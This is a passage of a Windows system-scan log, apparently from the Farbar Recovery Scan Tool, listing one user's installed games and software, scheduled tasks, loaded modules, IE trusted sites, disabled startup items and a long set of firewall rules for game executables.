The Witcher 3: Wild Hunt - Skellige Armor Set (HKLM-x32\...\Skellige Armor Set_is1) (Version: 1.0.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Temerian Armor Set (HKLM-x32\...\Temerian Armor Set_is1) (Version: 1.0.0.0 - GOG.com)
Unity Web Player (HKU\S-1-5-21-671774419-928818983-1318283798-1000\...\UnityWebPlayer) (Version: 4.6.2f1 - Unity Technologies ApS)
Ventrilo Client for Windows x64 (HKLM\...\{EEB3F6BB-318D-4CE5-989F-8191FCBFB578}) (Version: 3.0.8.0 - Flagship Industries, Inc.)
Warframe (HKLM-x32\...\Steam App 230410) (Version:  - Digital Extremes)
WebM Project Directshow Filters (HKU\S-1-5-21-671774419-928818983-1318283798-1000\...\webmdshow) (Version:  - )
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Xiph.Org Open Codecs 0.85.17777 (HKLM-x32\...\Open Codecs) (Version: 0.85.17777 - Xiph.Org)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-671774419-928818983-1318283798-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Rainsford\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-671774419-928818983-1318283798-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Rainsford\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll (Google Inc.)

==================== Restore Points =========================

25-09-2015 11:05:06 Windows Update
29-09-2015 07:29:18 Windows Update
02-10-2015 19:50:50 Windows Update
06-10-2015 15:23:47 Windows Update
09-10-2015 21:01:53 Windows Update
09-10-2015 21:30:37 Removed System Requirements Lab

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {057BC8EF-EAD1-4ECE-ABCF-C306DF8BB6C3} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe [2014-03-19] (Microsoft)
Task: {396C368A-C84B-480B-8407-6A7744C239E5} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-671774419-928818983-1318283798-1000Core => C:\Users\Rainsford\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {410694CD-4DD8-4442-BBD3-AC8DFA3EF4DB} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2013-06-19] (Piriform Ltd)
Task: {4155E688-ABA9-4E6F-9440-4B6D5E668879} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {53C88EEA-2693-4DDB-B539-B99925E17745} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {9154CCC5-4C32-476D-BF34-E7E02A61A631} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2014-03-19] (Microsoft Corporation)
Task: {9F85C9F6-05BF-4FA5-B493-7CF2C2B1F9E1} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-671774419-928818983-1318283798-1000UA => C:\Users\Rainsford\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {C4DAB8E7-5E91-4533-8AC5-BEEDB86C31FC} - System32\Tasks\Shut Down => C:\Windows\System32\shutdown.exe [2009-07-13] (Microsoft Corporation)
Task: {C51C5FCF-CDC9-4CD0-8BB3-2F40904B2D90} - System32\Tasks\Microsoft_MKC_Logon_Task_itype.exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2014-03-19] (Microsoft Corporation)
Task: {D57B9FE0-A7E1-4275-9EAB-2A6DE5F26178} - System32\Tasks\Microsoft_MKC_Logon_Task_ipoint.exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2014-03-19] (Microsoft Corporation)
Task: {E75D205A-ED8C-4B42-8760-435A6B8DE2F9} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2014-03-19] (Microsoft Corporation)
Task: {EF43FFF9-815C-409C-877F-F24AEDDA2913} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-07-07] (Adobe Systems Incorporated)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-671774419-928818983-1318283798-1000Core.job => C:\Users\Rainsford\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-671774419-928818983-1318283798-1000UA.job => C:\Users\Rainsford\AppData\Local\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (Whitelisted) ==============

2015-01-05 01:28 - 2015-01-11 05:44 - 00076152 _____ () C:\Windows\SysWOW64\PnkBstrA.exe
2015-09-01 16:11 - 2015-08-25 09:24 - 00116344 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2015-08-26 18:34 - 2015-08-26 19:37 - 00011896 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2013-07-01 08:20 - 2015-10-05 11:18 - 00778752 _____ () E:\Steam\SDL2.dll
2015-01-19 16:12 - 2015-07-03 11:12 - 04962816 _____ () E:\Steam\v8.dll
2015-01-19 16:12 - 2015-07-03 11:12 - 01556992 _____ () E:\Steam\icui18n.dll
2015-01-19 16:12 - 2015-07-03 11:12 - 01187840 _____ () E:\Steam\icuuc.dll
2014-05-22 17:27 - 2015-10-08 18:02 - 02422864 _____ () E:\Steam\video.dll
2014-08-29 12:13 - 2015-09-23 19:33 - 02549248 _____ () E:\Steam\libavcodec-56.dll
2014-08-29 12:13 - 2015-09-23 19:33 - 00442880 _____ () E:\Steam\libavutil-54.dll
2014-08-29 12:13 - 2015-09-23 19:33 - 00491008 _____ () E:\Steam\libavformat-56.dll
2014-08-29 12:13 - 2015-09-23 19:33 - 00332800 _____ () E:\Steam\libavresample-2.dll
2014-08-29 12:13 - 2015-09-23 19:33 - 00485888 _____ () E:\Steam\libswscale-3.dll
2013-07-09 17:56 - 2015-10-08 18:02 - 00704592 _____ () E:\Steam\bin\chromehtml.DLL
2015-07-21 21:46 - 2015-09-14 15:20 - 00193536 _____ () E:\Steam\bin\openvr_api.dll
2014-02-28 20:14 - 2014-02-28 20:14 - 00002560 _____ () C:\Windows\SysWOW64\CTXFIRES.DLL
2015-01-13 18:00 - 2009-06-29 11:54 - 00164864 _____ () C:\Windows\SysWOW64\APOMngr.DLL
2015-08-28 18:11 - 2015-08-28 18:11 - 00091136 _____ () C:\Program Files (x86)\Corsair\Corsair Utility Engine\LuaQtWrapperLibrary.dll
2015-08-28 18:09 - 2015-08-28 18:09 - 00200704 _____ () C:\Program Files (x86)\Corsair\Corsair Utility Engine\lua52.dll
2015-08-28 18:09 - 2015-08-28 18:09 - 00224256 _____ () C:\Program Files (x86)\Corsair\Corsair Utility Engine\quazip.dll
2013-07-09 13:45 - 2015-10-08 17:20 - 45010208 _____ () E:\Steam\bin\libcef.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:233BFF24

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\.DEFAULT\...\clonewarsadventures.com -> clonewarsadventures.com
IE trusted site: HKU\.DEFAULT\...\freerealms.com -> freerealms.com
IE trusted site: HKU\.DEFAULT\...\soe.com -> soe.com
IE trusted site: HKU\.DEFAULT\...\sony.com -> sony.com
IE trusted site: HKU\S-1-5-19\...\clonewarsadventures.com -> clonewarsadventures.com
IE trusted site: HKU\S-1-5-19\...\freerealms.com -> freerealms.com
IE trusted site: HKU\S-1-5-19\...\soe.com -> soe.com
IE trusted site: HKU\S-1-5-19\...\sony.com -> sony.com
IE trusted site: HKU\S-1-5-20\...\clonewarsadventures.com -> clonewarsadventures.com
IE trusted site: HKU\S-1-5-20\...\freerealms.com -> freerealms.com
IE trusted site: HKU\S-1-5-20\...\soe.com -> soe.com
IE trusted site: HKU\S-1-5-20\...\sony.com -> sony.com


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-671774419-928818983-1318283798-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Rainsford\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

MSCONFIG\Services: BEService => 3
MSCONFIG\Services: GalaxyClientService => 3
MSCONFIG\Services: GalaxyCommunication => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: MBAMService => 2
MSCONFIG\Services: Origin Client Service => 3
MSCONFIG\startupreg: Akamai NetSession Interface => "C:\Users\Rainsford\AppData\Local\Akamai\netsession_win.exe"
MSCONFIG\startupreg: amd_dc_opt => C:\Program Files (x86)\AMD\Dual-Core Optimizer\amd_dc_opt.exe
MSCONFIG\startupreg: GalaxyClient => C:\Program Files (x86)\GalaxyClient\GalaxyClient.exe /launchViaAutoStart
MSCONFIG\startupreg: Google Update => "C:\Users\Rainsford\AppData\Local\Google\Update\GoogleUpdate.exe" /c
MSCONFIG\startupreg: LWS => C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe -hide
MSCONFIG\startupreg: ShadowPlay => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [TCP Query User{BFDBC452-B969-4474-A333-864300AF51E6}E:\cube world\server.exe] => (Allow) E:\cube world\server.exe
FirewallRules: [UDP Query User{71D40BAA-ACB7-4CFD-8B83-640390A5B8FE}E:\cube world\server.exe] => (Allow) E:\cube world\server.exe
FirewallRules: [{6E08BFCF-D9A7-48FD-A0A1-4DA4A3D61CAA}] => (Allow) E:\Steam\Steam.exe
FirewallRules: [{BAE38A45-33B9-49EC-ABCD-7C8BD33116C8}] => (Allow) E:\Steam\Steam.exe
FirewallRules: [{FAFAAACA-09E7-4AA1-8D94-BEFF7F05B3F5}] => (Allow) E:\Steam\SteamApps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{763CECB0-F12A-43B2-82B9-CBEC2B931E69}] => (Allow) E:\Steam\SteamApps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{2F8BB03A-2D21-4909-B373-D54990C91258}] => (Allow) E:\Steam\SteamApps\common\left 4 dead\left4dead.exe
FirewallRules: [{7273A4F6-80CE-4ADA-ACB2-B8161D00B4F9}] => (Allow) E:\Steam\SteamApps\common\left 4 dead\left4dead.exe
FirewallRules: [{DB3E95FA-8BD5-479A-B878-E1125C8E6194}] => (Allow) C:\Program Files\HP\HP Deskjet 3050 J610 series\Bin\DeviceSetup.exe
FirewallRules: [{C0536F30-A1C7-4C5F-B1BA-42347BE1D1FC}] => (Allow) C:\Program Files\HP\HP Deskjet 3050 J610 series\Bin\DeviceSetup.exe
FirewallRules: [{7022FB18-D86C-4BE8-B843-6A2EF10435B6}] => (Allow) C:\Program Files\HP\HP Deskjet 3050 J610 series\Bin\HPNetworkCommunicator.exe
FirewallRules: [{E9A820E9-CF01-4BAD-9077-7D7C986BD08D}] => (Allow) C:\Program Files\HP\HP Deskjet 3050 J610 series\Bin\HPNetworkCommunicator.exe
FirewallRules: [{94A87F83-10A0-4650-9BC9-63D0DEB6D3AB}] => (Allow) C:\Program Files\Ventrilo\Ventrilo.exe
FirewallRules: [{20B03EC3-DA0E-4DD7-8732-0CB60847BD19}] => (Allow) C:\Program Files\Ventrilo\Ventrilo.exe
FirewallRules: [{BD4D586F-4339-477C-AD9E-F4B48ADAB608}] => (Allow) E:\Steam\SteamApps\common\LEGO Lord of the Rings\LEGOLOTR.exe
FirewallRules: [{E9F1978E-0015-49D4-81B7-9BE5820F65E2}] => (Allow) E:\Steam\SteamApps\common\LEGO Lord of the Rings\LEGOLOTR.exe
FirewallRules: [{E1F0B437-8805-47E4-B6FA-B53AB3805F89}] => (Allow) E:\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
FirewallRules: [{EACD5E72-705D-44F9-8169-CA3CB43E44C4}] => (Allow) E:\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
FirewallRules: [{E7C39D57-6F65-46A3-994D-021745425E41}] => (Allow) E:\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
FirewallRules: [{8BAF4C95-A503-46AB-B089-556690794ACE}] => (Allow) E:\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
FirewallRules: [{B17C5800-3EB1-4359-8D99-113B4DEA316B}] => (Allow) E:\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
FirewallRules: [{814FD1A3-4F3F-436B-8B6D-7BD93AAB1727}] => (Allow) E:\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
FirewallRules: [{AAB7E1F9-B8FF-4F68-959E-B46E3C0A1D84}] => (Allow) E:\Steam\SteamApps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{985BDA3A-5AF5-4243-9711-722A2FC665D5}] => (Allow) E:\Steam\SteamApps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{895AA931-32C8-4759-AE60-1490487C5173}] => (Allow) E:\Steam\SteamApps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe
FirewallRules: [{18CAED4C-9AF2-4C3A-BC32-EC6F3DAF1B14}] => (Allow) E:\Steam\SteamApps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe
FirewallRules: [{0C4C7831-505E-4B39-9E1E-A210763384C6}] => (Allow) E:\Steam\SteamApps\common\Folk Tale\Folk Tale.exe
FirewallRules: [{BF867ACC-0403-417A-8117-B4A98C10AD05}] => (Allow) E:\Steam\SteamApps\common\Folk Tale\Folk Tale.exe
FirewallRules: [{0AFD057D-65F9-4698-8BBF-46F8005297A3}] => (Allow) E:\Steam\SteamApps\common\Rogue Legacy\RogueLegacy.exe
FirewallRules: [{801DC309-180C-4504-9C4D-8A8330ECE1A9}] => (Allow) E:\Steam\SteamApps\common\Rogue Legacy\RogueLegacy.exe
FirewallRules: [{626A4561-28CA-4B30-9A73-42EFE275A9E7}] => (Allow) E:\Steam\SteamApps\common\Lego Star Wars Saga\LEGOStarWarsSaga.exe
FirewallRules: [{360FF8FE-FB71-4744-BD87-C7053B61F1AC}] => (Allow) E:\Steam\SteamApps\common\Lego Star Wars Saga\LEGOStarWarsSaga.exe
FirewallRules: [{2604170D-E778-454D-8DB6-89F05846B7CC}] => (Allow) C:\Users\Rainsford\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{2B44E01E-31BF-434D-8465-DA8D4147C906}] => (Allow) C:\Users\Rainsford\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{2FFA375C-2B41-4F04-A8DA-F082F100817E}] => (Allow) E:\Steam\SteamApps\common\Resident Evil 4\Bin32\bio4.exe
FirewallRules: [{1F239078-9A44-47FF-BF54-6A177C0B43FF}] => (Allow) E:\Steam\SteamApps\common\Resident Evil 4\Bin32\bio4.exe
FirewallRules: [{E5E4AE47-31B4-4448-886A-BA5FEBBAF644}] => (Allow) E:\Steam\bin\steamwebhelper.exe
FirewallRules: [{5AD08DF9-1F92-415E-A840-492AB893AEB3}] => (Allow) E:\Steam\bin\steamwebhelper.exe
FirewallRules: [{5DAA2937-A6E2-47BA-AEA9-43944056D8FF}] => (Allow) D:\Steam\SteamApps\common\FaceRig\Bin\FaceRig.exe
FirewallRules: [{88A55836-2520-40BE-B577-F5F42CBA96DF}] => (Allow) D:\Steam\SteamApps\common\FaceRig\Bin\FaceRig.exe
FirewallRules: [TCP Query User{2AFBD48F-3845-484A-9B2E-906858651FAC}D:\steam\steamapps\common\war thunder\aces.exe] => (Allow) D:\steam\steamapps\common\war thunder\aces.exe
FirewallRules: [UDP Query User{6A13CFCD-796A-474F-B514-74E18BF35BD2}D:\steam\steamapps\common\war thunder\aces.exe] => (Allow) D:\steam\steamapps\common\war thunder\aces.exe
FirewallRules: [{491F1CDB-0E77-4D4B-945C-2C9564D2985E}] => (Block) D:\steam\steamapps\common\war thunder\aces.exe
FirewallRules: [{26A05D2E-E639-48AC-B07F-BFA2199E84E8}] => (Block) D:\steam\steamapps\common\war thunder\aces.exe
FirewallRules: [{EDCCE3D2-4BF2-4239-B562-A97F96D7C54B}] => (Allow) D:\Steam\SteamApps\common\FaceRig\Bin\Launcher.exe
FirewallRules: [{F374D182-E5EF-4DB6-8BD9-F265F3BA10E9}] => (Allow) D:\Steam\SteamApps\common\FaceRig\Bin\Launcher.exe
FirewallRules: [{005355AF-03FC-47A5-ADEB-6A580F91AFEE}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{C30D9B16-4D4B-45EE-9869-5E404A10AD1B}C:\program files (x86)\lolreplay\lolreplay.exe] => (Allow) C:\program files (x86)\lolreplay\lolreplay.exe
FirewallRules: [UDP Query User{00E67094-1EF4-47BA-8B9F-8FFE0A2CB51C}C:\program files (x86)\lolreplay\lolreplay.exe] => (Allow) C:\program files (x86)\lolreplay\lolreplay.exe
FirewallRules: [{F73283FA-8F4B-40B9-B081-C1836B4F226D}] => (Block) C:\program files (x86)\lolreplay\lolreplay.exe
FirewallRules: [{5F25B14A-B5F6-4555-9947-8B70C06F5163}] => (Block) C:\program files (x86)\lolreplay\lolreplay.exe
FirewallRules: [{A3C7379B-3DA6-40A9-AA6A-3460A3F187CF}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{A6E6C99C-C644-437F-97B1-F8CB79A76DB3}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{96BFB049-46CB-467E-9113-D38FD6E34774}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{F844AA44-407C-4EF1-9F94-760C27B24D4F}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{C66A5953-9B0E-482B-A60B-5F30215E132E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{F868B400-0AB7-46D1-BBEA-F5597B27A416}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{1E4DEC2B-20E3-4904-8E20-28F5D9AEFBCC}] => (Allow) C:\Games\Final Fantasy\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivboot.exe
FirewallRules: [{D61F4363-E1C8-4426-BCE6-0290FD081469}] => (Allow) C:\Games\Final Fantasy\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivboot.exe
FirewallRules: [{B460A1FB-C72C-415A-B913-EEEB540D312B}] => (Allow) C:\Games\Final Fantasy\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivlauncher.exe
FirewallRules: [{A3338958-A22C-4216-9F3E-9863A57D5A91}] => (Allow) C:\Games\Final Fantasy\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivlauncher.exe
FirewallRules: [{589B4BAA-86FE-4EFC-A245-3C7B65EAF5E8}] => (Allow) E:\Steam\SteamApps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{57180CCE-D3FB-4C09-AC3C-69FB5E2913EB}] => (Allow) E:\Steam\SteamApps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{EF176EB4-92AB-4E03-A64A-731419CBF641}] => (Allow) E:\Steam\SteamApps\common\Grand Theft Auto V\GTAVLauncher.exe
FirewallRules: [{83E45121-4288-49B0-BB42-BD28B5C23512}] => (Allow) E:\Steam\SteamApps\common\Grand Theft Auto V\GTAVLauncher.exe
FirewallRules: [TCP Query User{F37557B9-4C6F-4D2C-8307-FBF62319DF56}E:\steam\steamapps\common\grand theft auto v\gta5.exe] => (Allow) E:\steam\steamapps\common\grand theft auto v\gta5.exe
FirewallRules: [UDP Query User{969B3398-D375-4E58-B2E0-9F649E6F1017}E:\steam\steamapps\common\grand theft auto v\gta5.exe] => (Allow) E:\steam\steamapps\common\grand theft auto v\gta5.exe
FirewallRules: [{70D192B7-3C62-44D6-B155-36B9F79128FB}] => (Allow) C:\Program Files (x86)\Origin\Games\Plants vs Zombies Garden Warfare\PVZ.Main_Win64_Retail.exe
FirewallRules: [{A7190AC9-D0AD-411F-9F1E-011928B5DAB0}] => (Allow) C:\Program Files (x86)\Origin\Games\Plants vs Zombies Garden Warfare\PVZ.Main_Win64_Retail.exe
FirewallRules: [{A2AEB4F3-A587-4D58-B6D9-44924F105255}] => (Allow) E:\Steam\SteamApps\common\Dark Souls II\Game\DarkSoulsII.exe
FirewallRules: [{574445D7-8613-47DD-9671-90E1AEC69AD2}] => (Allow) E:\Steam\SteamApps\common\Dark Souls II\Game\DarkSoulsII.exe
FirewallRules: [TCP Query User{5D71F6FD-380A-4EBC-9BD1-5AB8E8785009}C:\program files\java\jre1.8.0_45\bin\java.exe] => (Allow) C:\program files\java\jre1.8.0_45\bin\java.exe
FirewallRules: [UDP Query User{0AB1ECAC-A617-4470-90F9-34FD577A4E68}C:\program files\java\jre1.8.0_45\bin\java.exe] => (Allow) C:\program files\java\jre1.8.0_45\bin\java.exe
FirewallRules: [{C57453AB-9669-4FB7-9F17-4E97D442C398}] => (Allow) E:\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{8506C8AF-1E70-40D1-8BC9-7A91B915B89A}] => (Allow) E:\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{F4F266A7-BA95-40EB-A9CC-7F6903C1E6C9}] => (Allow) E:\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{EF4F0D30-4E79-452E-89B6-5AF34D47E8BA}] => (Allow) E:\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{D8758C27-76ED-4F3A-8D91-5FCBD28BB0A8}] => (Allow) E:\Steam\steamapps\common\Warframe\Tools\Launcher.exe
FirewallRules: [{00803F2A-A997-44F4-802B-F19DA1FBA857}] => (Allow) E:\Steam\steamapps\common\Warframe\Tools\RemoteCrashSender.exe
FirewallRules: [{83883E09-53A0-4743-BDEB-1FE97BC82FBC}] => (Allow) E:\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{A6C0A8BD-9B28-409A-B0F6-4AC1D430ED04}] => (Allow) E:\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{AE8BA216-910F-4E1A-AE9C-AD0148D23351}] => (Allow) E:\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{46AA55A3-0A8E-4791-A1AA-ED3FB28F8901}] => (Allow) E:\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{EE83B4FE-F8EA-48EB-8854-7DADFADC7071}] => (Allow) E:\Steam\steamapps\common\Warframe\Tools\Launcher.exe
FirewallRules: [{EF774EF4-AE62-452D-AABB-742510CB8D97}] => (Allow) E:\Steam\steamapps\common\Warframe\Tools\RemoteCrashSender.exe
FirewallRules: [{4B19D8CC-4E53-4DB5-AFA7-685BA9254663}] => (Allow) E:\Steam\SteamApps\common\Creeper World 3\CW3.exe
FirewallRules: [{A2C44820-72DC-4389-8F20-9ED0AA20285A}] => (Allow) E:\Steam\SteamApps\common\Creeper World 3\CW3.exe
FirewallRules: [{90ADC940-E26E-4CE3-B67A-7A8EC41273B5}] => (Allow) E:\Steam\SteamApps\common\Fallout New Vegas\FalloutNVLauncher.exe
FirewallRules: [{C19CB68B-DD64-48E4-8390-D4A90B3F0EB4}] => (Allow) E:\Steam\SteamApps\common\Fallout New Vegas\FalloutNVLauncher.exe
FirewallRules: [{2D08790A-55E9-47AF-9060-1EA2CEA0C77D}] => (Allow) D:\Steam\SteamApps\common\Trails in the Sky FC\ed6_win.exe
FirewallRules: [{435FDB8B-F1AB-47FE-9BDE-232AC555244F}] => (Allow) D:\Steam\SteamApps\common\Trails in the Sky FC\ed6_win.exe
FirewallRules: [{4C8795B8-BA31-4E80-8B8F-E7E909C6875E}] => (Allow) D:\Steam\SteamApps\common\Trails in the Sky FC\Config.exe
FirewallRules: [{F33856D3-7947-462C-BC6D-C44C59EB7839}] => (Allow) D:\Steam\SteamApps\common\Trails in the Sky FC\Config.exe
FirewallRules: [{F2B9D881-3C69-4A54-958E-E125223A409E}] => (Allow) D:\Steam\SteamApps\common\Starpoint Gemini 2\StarpointGemini2.exe
FirewallRules: [{B9154475-5134-48B8-BE98-5E9292A2EA1F}] => (Allow) D:\Steam\SteamApps\common\Starpoint Gemini 2\StarpointGemini2.exe
FirewallRules: [{A92600EC-D78E-42BA-8D94-36990C1D919F}] => (Allow) D:\Steam\SteamApps\common\Hardland\Hardland.exe
FirewallRules: [{3A9F4FCD-2165-40A1-84A6-76AADD75DE06}] => (Allow) D:\Steam\SteamApps\common\Hardland\Hardland.exe
FirewallRules: [TCP Query User{0D1DA35C-0B9D-44ED-B196-11C01BD439E4}C:\users\rainsford\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\rainsford\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{1E1477F8-AA0E-45D6-8865-AE3ACAC4C065}C:\users\rainsford\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\rainsford\appdata\local\akamai\netsession_win.exe
FirewallRules: [{6830A96F-7D88-49D3-82E1-D42570AC6A57}] => (Allow) D:\Steam\SteamApps\common\Resident Evil 5\Launcher.exe
FirewallRules: [{576FB9D6-608C-4E98-8E65-CC8AF1A1A32A}] => (Allow) D:\Steam\SteamApps\common\Resident Evil 5\Launcher.exe
FirewallRules: [TCP Query User{6F305C4B-A619-4C14-8E45-8414C50C3940}D:\steam\steamapps\common\resident evil 5\re5dx9.exe] => (Allow) D:\steam\steamapps\common\resident evil 5\re5dx9.exe
FirewallRules: [UDP Query User{C254B5EF-CFB3-4883-B449-DB62D605DC46}D:\steam\steamapps\common\resident evil 5\re5dx9.exe] => (Allow) D:\steam\steamapps\common\resident evil 5\re5dx9.exe
FirewallRules: [TCP Query User{2271D2CA-B2AD-44BF-A9F6-E60C263B15F8}C:\program files (x86)\cabal2 (us)\c2launcher.exe] => (Allow) C:\program files (x86)\cabal2 (us)\c2launcher.exe
FirewallRules: [UDP Query User{D09F2206-6AE2-45A5-AEEA-EF284C3260A9}C:\program files (x86)\cabal2 (us)\c2launcher.exe] => (Allow) C:\program files (x86)\cabal2 (us)\c2launcher.exe
FirewallRules: [{7BD94C4A-A39A-4F52-9B68-35FAD1690595}] => (Allow) E:\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{801D2BCC-A17C-49AB-A43D-24821A321037}] => (Allow) E:\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{E7175DCF-BA58-4262-9DFD-6C28E534D452}] => (Allow) E:\Steam\SteamApps\common\Robocraft\Robocraft.exe
FirewallRules: [{4649A39A-750D-4FE4-8C14-0609D7CF5F16}] => (Allow) E:\Steam\SteamApps\common\Robocraft\Robocraft.exe
FirewallRules: [{C51D2E94-87FF-492A-AAB5-5B666238066A}] => (Allow) C:\Users\Rainsford\AppData\Local\MyComGames\MyComGames.exe
FirewallRules: [{2AECCC2D-8D5C-4C15-AAD6-87723E8E55F5}] => (Allow) C:\Users\Rainsford\AppData\Local\MyComGames\MyComGames.exe
FirewallRules: [{B8DB63BB-916B-4830-8DA0-6596A96B9A1C}] => (Allow) E:\Steam\SteamApps\common\PAC-MAN Championship Edition DX+\PAC-MAN.exe
FirewallRules: [{F4D067E2-E3AF-40DC-88C5-1BE99B8BC5FD}] => (Allow) E:\Steam\SteamApps\common\PAC-MAN Championship Edition DX+\PAC-MAN.exe
FirewallRules: [{5FF4FF90-74EE-4AA1-8326-DAD71A6ACA9E}] => (Allow) E:\Steam\SteamApps\common\Dark Souls Prepare to Die Edition\DATA\DARKSOULS.exe
